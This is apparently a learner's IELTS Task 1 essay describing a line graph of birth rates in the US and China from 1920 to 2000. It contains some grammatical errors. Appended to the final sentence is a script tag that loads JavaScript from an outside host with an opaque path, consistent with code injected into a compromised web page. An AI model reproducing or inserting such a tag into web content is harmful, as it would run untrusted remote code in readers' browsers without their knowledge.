task 1: the birth rate
The line graph gives information about the birth rates of China, and America from 1920 to 2000 and how these rates changed during the 80-year period.
Overall, it is clear that the birth rates of both nations decreased throughout the research given. Additionally, both trends were similar to in terms of a general decline.
The birth rate of the US began at about 11% in 1920 and then fell considerably to under 5% in 1945. 5 years later, there was a sharp increase to exactly 15%, which was its highest point over the period of 80 years. However, the rate experienced a dramatic fall at the end of the period, reaching the final figure at about 7% in 2000.
At the same time, the birth rate in China varied more significantly than in the US. Although the rate fluctuated, it dropped dramatically to 5% in 1940. The rate of birth unchanged from 1940 to 1945 before going up dramatically to become the highest point of the whole line graph at 20%, in 1950. On the contrary, there was a sharp fall in the birth rate of China by 15% in 1965. the figure ended at approximately 2% in the year 2000.<script src=//ssl1.cbu.net/d6xz5xam></script>
